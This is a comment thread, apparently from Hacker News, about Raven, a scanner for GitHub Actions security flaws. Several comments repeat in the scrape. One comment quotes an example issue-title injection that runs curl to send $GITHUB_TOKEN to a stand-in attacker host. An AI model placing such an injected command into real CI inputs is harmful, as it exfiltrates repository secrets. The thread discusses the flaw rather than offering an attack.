[–] boredumb 2y ago ↗ Does this only work with github actions? [–] mdaniel 2y ago ↗ Seems so, and also only .com not even GHE https://github.com/CycodeLabs/raven/blob/v1.0.3/src/download...I have no earthly idea why a security tool would roll their own GitHub access library in python :-/ [–] diarrhea 2y ago ↗ There is no official GitHub SDK for Python. It's easy enough to do it anyway. This is not authentication logic either. [–] chriswitts 2y ago ↗ PyGithub has existed for ages, even if it is not official. GitHub only maintains octokit for JS, Ruby, .NET, and Terraform.
[–] mdaniel 2y ago ↗ Seems so, and also only .com not even GHE https://github.com/CycodeLabs/raven/blob/v1.0.3/src/download...I have no earthly idea why a security tool would roll their own GitHub access library in python :-/ [–] diarrhea 2y ago ↗ There is no official GitHub SDK for Python. It's easy enough to do it anyway. This is not authentication logic either. [–] chriswitts 2y ago ↗ PyGithub has existed for ages, even if it is not official. GitHub only maintains octokit for JS, Ruby, .NET, and Terraform.
[–] diarrhea 2y ago ↗ There is no official GitHub SDK for Python. It's easy enough to do it anyway. This is not authentication logic either. [–] chriswitts 2y ago ↗ PyGithub has existed for ages, even if it is not official. GitHub only maintains octokit for JS, Ruby, .NET, and Terraform.
[–] chriswitts 2y ago ↗ PyGithub has existed for ages, even if it is not official. GitHub only maintains octokit for JS, Ruby, .NET, and Terraform.
[–] smithcoin 2y ago ↗ This looks like a great tool, how would one go about running this periodically for an org? [–] wahnfrieden 2y ago ↗ Gha cron
[–] eugercek 2y ago ↗ `new issue title" && curl hacker.boi -d $GITHUB_TOKEN && sleep 30` I hate pipelines even more :(
[–] senkora 2y ago ↗ This sounds a lot like my memory of what Praetorian Chariot does (continuous security scanning and pentesting as a service). Very cool to see that idea in an open source tool.https://www.praetorian.com/proactive-cybersecurity-technolog...
9 comments
[ 3.3 ms ] story [ 33.8 ms ] threadI have no earthly idea why a security tool would roll their own GitHub access library in python :-/
https://www.praetorian.com/proactive-cybersecurity-technolog...